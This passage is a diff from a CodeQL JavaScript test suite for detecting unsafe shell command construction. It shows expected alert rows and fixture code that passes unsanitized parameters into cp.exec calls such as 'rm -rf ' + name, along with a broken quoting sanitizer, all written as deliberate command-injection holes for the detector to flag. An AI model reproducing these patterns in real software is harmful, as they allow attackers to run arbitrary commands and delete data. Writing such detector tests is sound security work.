lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:224:2:224:26 | cp.exec ... + name) | shell command | -| lib/lib.js:228:10:228:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:228:22:228:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:228:2:228:26 | cp.exec ... + name) | shell command | -| lib/lib.js:236:10:236:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:236:22:236:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:236:2:236:26 | cp.exec ... + name) | shell command | -| lib/lib.js:249:10:249:25 | "rm -rf " + name | lib/lib.js:248:42:248:45 | name | lib/lib.js:249:22:249:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:249:2:249:26 | cp.exec ... + name) | shell command | -| lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | lib/lib.js:248:42:248:45 | name | lib/lib.js:253:22:253:28 | cleaned | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:253:2:253:29 | cp.exec ... leaned) | shell command | -| lib/lib.js:258:10:258:25 | "rm -rf " + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:258:22:258:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:258:2:258:26 | cp.exec ... + name) | shell command | -| lib/lib.js:261:11:261:33 | "rm -rf ... + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:261:30:261:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:261:3:261:34 | cp.exec ... + name) | shell command | -| lib/lib.js:268:10:268:32 | "rm -rf ... version | lib/lib.js:267:46:267:48 | obj | lib/lib.js:268:22:268:32 | obj.version | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:267:46:267:48 | obj | library input | lib/lib.js:268:2:268:33 | cp.exec ... ersion) | shell command | -| lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:277:23:277:30 | opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | shell command | -| lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:281:23:281:35 | this.opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | shell command | -| lib/lib.js:308:11:308:26 | "rm -rf " + name | lib/lib.js:307:39:307:42 | name | lib/lib.js:308:23:308:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:307:39:307:42 | name | library input | lib/lib.js:308:3:308:27 | cp.exec ... + name) | shell command | -| lib/lib.js:315:10:315:25 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:315:22:315:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:315:2:315:26 | cp.exec ... + name) | shell command | -| lib/lib.js:320:11:320:26 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:320:23:320:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:320:3:320:27 | cp.exec ... + name) | shell command | -| lib/lib.js:325:12:325:51 | "MyWind ... " + arg | lib/lib.js:324:40:324:42 | arg | lib/lib.js:325:49:325:51 | arg | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:324:40:324:42 | arg | library input | lib/lib.js:326:2:326:13 | cp.exec(cmd) | shell command | -| lib/lib.js:340:10:340:26 | "rm -rf " + id(n) | lib/lib.js:339:39:339:39 | n | lib/lib.js:340:22:340:26 | id(n) | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:339:39:339:39 | n | library input | lib/lib.js:340:2:340:27 | cp.exec ... id(n)) | shell command | -| lib/lib.js:351:10:351:27 | "rm -rf " + unsafe | lib/lib.js:349:29:349:34 | unsafe | lib/lib.js:351:22:351:27 | unsafe | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:349:29:349:34 | unsafe | library input | lib/lib.js:351:2:351:28 | cp.exec ... unsafe) | shell command | -| lib/lib.js:406:10:406:25 | "rm -rf " + name | lib/lib.js:405:39:405:42 | name | lib/lib.js:406:22:406:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:405:39:405:42 | name | library input | lib/lib.js:406:2:406:26 | cp.exec ... + name) | shell command | -| lib/lib.js:415:10:415:25 | "rm -rf " + name | lib/lib.js:414:40:414:43 | name | lib/lib.js:415:22:415:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:415:2:415:26 | cp.exec ... + name) | shell command | -| lib/lib.js:417:28:417:31 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:417:28:417:31 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:417:2:417:66 | cp.exec ... => {}) | shell command | -| lib/lib.js:418:25:418:28 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:418:25:418:28 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:418:2:418:45 | cp.spaw ... true}) | shell command | -| lib/lib.js:419:32:419:35 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:419:32:419:35 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:419:2:419:52 | cp.exec ... true}) | shell command | -| lib/lib.js:420:29:420:32 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:420:29:420:32 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:420:2:420:49 | cp.spaw ... true}) | shell command | -| lib/lib.js:424:24:424:27 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:424:24:424:27 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:426:11:426:14 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:426:11:426:14 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:427:14:427:16 | arr | lib/lib.js:414:40:414:43 | name | lib/lib.js:427:14:427:16 | arr | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:428:14:428:58 | build(" ... + '-') | lib/lib.js:414:40:414:43 | name | lib/lib.js:428:14:428:58 | build(" ... + '-') | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:436:19:436:22 | last | lib/lib.js:414:40:414:43 | name | lib/lib.js:436:19:436:22 | last | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:442:12:442:27 | "rm -rf " + name | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:441:39:441:42 | name | library input | lib/lib.js:442:2:442:28 | asyncEx ... + name) | shell command | -| lib/lib.js:447:13:447:28 | "rm -rf " + name | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:446:20:446:23 | name | library input | lib/lib.js:447:3:447:29 | asyncEx ... + name) | shell command | -| lib/lib.js:478:27:478:46 | config.installedPath | lib/lib.js:477:33:477:38 | config | lib/lib.js:478:27:478:46 | config.installedPath | This path concatenation which depends on $@ is later used in a $@. | lib/lib.js:477:33:477:38 | config | library input | lib/lib.js:479:12:479:20 | exec(cmd) | shell command | -| lib/lib.js:483:13:483:33 | ' my na ... + name | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:482:40:482:43 | name | library input | lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | shell command | -| lib/lib.js:499:19:499:34 | "rm -rf " + name | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:498:45:498:48 | name | library input | lib/lib.js:499:3:499:35 | MyThing ... + name) | shell command | -| lib/lib.js:510:10:510:25 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:510:22:510:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:510:2:510:26 | cp.exec ... + name) | shell command | -| lib/lib.js:513:11:513:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:513:23:513:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:513:3:513:27 | cp.exec ... + name) | shell command | -| lib/lib.js:519:11:519:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:519:23:519:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:519:3:519:27 | cp.exec ... + name) | shell command | -| lib/lib.js:525:11:525:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:525:23:525:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:525:3:525:27 | cp.exec ... + name) | shell command | -| lib/lib.js:531:11:531:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:531:23:531:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:531:3:531:27 | cp.exec ... + name) | shell command | -| lib/lib.js:537:11:537:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:537:23:537:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:537:3:537:27 | cp.exec ... + name) | shell command | -| lib/lib.js:543:11:543:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:543:23:543:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:543:3:543:27 | cp.exec ... + name) | shell command | -| lib/lib.js:545:11:545:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:545:3:545:27 | cp.exec ... + name) | shell command | -| lib/lib.js:552:23:552:26 | args | lib/lib.js:550:39:550:42 | name | lib/lib.js:552:23:552:26 | args | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | -| lib/lib.js:555:33:555:36 | name | lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | -| lib/lib.js:560:14:560:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:560:26:560:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:560:9:560:30 | exec("r ... + name) | shell command | -| lib/lib.js:562:14:562:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:562:26:562:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:562:9:562:30 | exec("r ... + name) | shell command | -| lib/lib.js:566:14:566:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:566:26:566:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:566:9:566:30 | exec("r ... + name) | shell command | -| lib/lib.js:573:10:573:25 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:573:22:573:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:573:2:573:26 | cp.exec ... + name) | shell command | -| lib/lib.js:579:13:579:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:579:25:579:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:579:5:579:29 | cp.exec ... + name) | shell command | -| lib/lib.js:590:17:590:32 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:590:29:590:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:590:9:590:33 | cp.exec ... + name) | shell command | -| lib/lib.js:593:13:593:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:593:25:593:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:593:5:593:29 | cp.exec ... + name) | shell command | -| lib/lib.js:609:10:609:25 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:609:22:609:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:609:2:609:26 | cp.exec ... + name) | shell command | -| lib/lib.js:626:17:626:32 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:626:29:626:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:626:9:626:33 | cp.exec ... + name) | shell command | -| lib/lib.js:629:13:629:28 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:629:25:629:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:629:5:629:29 | cp.exec ... + name) | shell command | -| lib/lib.js:633:18:633:68 | "'" + n ... ) + "'" | lib/lib.js:632:38:632:41 | name | lib/lib.js:633:24:633:62 | name.re ... '\\\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | -| lib/lib.js:634:10:634:30 | "rm -rf ... nitized | lib/lib.js:632:38:632:41 | name | lib/lib.js:634:22:634:30 | sanitized | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | -| lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/compiled-file.ts:3:26:3:29 | name | library input | lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | shell command | -| lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | lib/subLib2/special-file.js:3:28:3:31 | name | lib/subLib2/special-file.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/special-file.js:3:28:3:31 | name | library input | lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | lib/subLib3/my-file.ts:3:28:3:31 | name | lib/subLib3/my-file.ts:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib3/my-file.ts:3:28:3:31 | name | library input | lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | lib/subLib4/index.js:6:32:6:35 | name | lib/subLib4/subsub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib4/index.js:6:32:6:35 | name | library input | lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | lib/subLib/amdSub.js:3:28:3:31 | name | lib/subLib/amdSub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/amdSub.js:3:28:3:31 | name | library input | lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | lib/subLib/index.js:3:28:3:31 | name | lib/subLib/index.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:3:28:3:31 | name | library input | lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | lib/subLib/index.js:7:32:7:35 | name | lib/subLib/index.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:7:32:7:35 | name | library input | lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:14:22:14:24 | arr | lib/subLib/index.js:13:44:13:46 | arr | lib/subLib/index.js:14:22:14:24 | arr | This shell argument which depends on $@ is later used in a $@. | lib/subLib/index.js:13:44:13:46 | arr | library input | lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | shell command | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref index f1dbca0e19c9..26c43ff16ca6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref @@ -1 +1,2 @@ -Security/CWE-078/UnsafeShellCommandConstruction.ql \ No newline at end of file +query: Security/CWE-078/UnsafeShellCommandConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 116b624615b1..b4f75df03ac4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -2,6 +2,6 @@ const cp = require("child_process"); -module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.thisMethodIsImported = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 75fda0090000..85d0402a8ae8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,134 +1,134 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blah = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.execFile(name, [name]); // OK - cp.execFile(name, name); // OK + cp.execFile(name, [name]); + cp.execFile(name, name); }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.foo.bar = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } function cla() { } -cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK +cla.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports = new cla(); +module.exports.cla = new cla(); function cla2() { } -cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK +cla2.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.bla = new cla2(); module.exports.lib2 = require("./lib2.js") class Cla3 { - constructor(name) { - cp.exec("rm -rf " + name); // NOT OK + constructor(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - static foo(name) { - cp.exec("rm -rf " + name); // NOT OK + static foo(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - bar(name) { - cp.exec("rm -rf " + name); // NOT OK + bar(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.exec("rm -rf " + notASource); // OK + cp.exec("rm -rf " + notASource); } } module.exports.cla3 = Cla3; -module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // NOT OK. +module.exports.mz = function (name) { // $ Source + require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink } -module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // NOT OK. +module.exports.flow = function (name) { // $ Source + var cmd1 = "rm -rf " + name; // $ Alert Sink cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // NOT OK. + var cmd2 = "rm -rf " + name; // $ Alert Sink function myExec(cmd) { cp.exec(cmd); } myExec(cmd2); } -module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // NOT OK. +module.exports.stringConcat = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.exec(name); // OK. + cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // NOT OK. + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink - cp.exec("cat /foO/BAR/" + name) // NOT OK. + cp.exec("cat /foO/BAR/" + name) // $ Alert Sink - cp.exec("cat \"" + name + "\"") // NOT OK. + cp.exec("cat \"" + name + "\"") // $ Alert Sink - cp.exec("cat '" + name + "'") // NOT OK. + cp.exec("cat '" + name + "'") // $ Alert Sink - cp.exec("cat '/foo/bar" + name + "'") // NOT OK. + cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink - cp.exec(name + " some file") // OK. + cp.exec(name + " some file") } -module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // NOT OK. +module.exports.arrays = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var args1 = ["node"]; - args1.push(name); // NOT OK. + args1.push(name); // $ Alert cp.exec(args1.join(" ")); - cp.exec(["rm -rf", name].join(" ")); // NOT OK. + cp.exec(["rm -rf", name].join(" ")); // $ Alert - cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK. + cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // $ Alert - cp.execFile("rm", ["-rf", name]); // OK + cp.execFile("rm", ["-rf", name]); } var util = require("util"); -module.exports.format = function (name) { - cp.exec(util.format("rm -rf %s", name)); // NOT OK +module.exports.format = function (name) { // $ Source + cp.exec(util.format("rm -rf %s", name)); // $ Alert - cp.exec(util.format("rm -rf '%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '%s'", name)); // $ Alert - cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // $ Alert - cp.exec(util.format("%s foo/bar", name)); // OK + cp.exec(util.format("%s foo/bar", name)); - cp.exec(util.format("for foo in (%s) do bar end", name)); // OK + cp.exec(util.format("for foo in (%s) do bar end", name)); - cp.exec(require("printf")('rm -rf %s', name)); // NOT OK + cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } -module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.valid = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isValidName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } -module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.safe = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isSafeName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } class Cla4 { - wha(name) { - cp.exec("rm -rf " + name); // NOT OK + wha(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } static bla(name) { @@ -145,20 +145,20 @@ function Cla5(name) { } module.exports.cla5 = new Cla5(); -module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // NOT OK +module.exports.indirect = function (name) { // $ Source + let cmd = "rm -rf " + name; // $ Alert Sink let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); } -module.exports.indirect2 = function (name) { +module.exports.indirect2 = function (name) { // $ Source let cmd = name; let sh = "sh"; let args = ["-c", cmd]; - cp.spawn(sh, args, cb); // OK + cp.spawn(sh, args, cb); - let cmd2 = "rm -rf " + name; + let cmd2 = "rm -rf " + name; // $ Alert Sink var args2 = [cmd2]; cp.spawn( 'cmd.exe', @@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) { ); } -module.exports.cmd = function (command, name) { - cp.exec("fo | " + command); // OK +module.exports.cmd = function (command, name) { // $ Source + cp.exec("fo | " + command); - cp.exec("fo | " + name); // NOT OK + cp.exec("fo | " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { +module.exports.sanitizer = function (name) { // $ Source var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); - var broken = "'" + name.replace(/'/g, "'\''") + "'" - cp.exec("rm -rf " + broken); // NOT OK + var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + broken); // $ Alert Sink } var path = require("path"); -module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.guard = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!path.exist(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } -module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blacklistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } } -module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.whitelistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blackList2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink process.exit(-1); } - cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } -module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.accessSync = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { @@ -245,40 +245,40 @@ var cleanInput = function (s) { return s; } -module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.goodSanitizer = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // OK - But FP due to SanitizingRegExpTest not being able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); -module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.guard2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // NOT OK + cp.exec("rm -rf prefix/" + name); // $ Alert Sink return; } - cp.exec("rm -rf prefix/" + name); // OK + cp.exec("rm -rf prefix/" + name); } -module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // NOT OK +module.exports.sanitizerProperty = function (obj) { // $ Source + cp.exec("rm -rf " + obj.version); // $ Alert Sink obj.version = ""; - 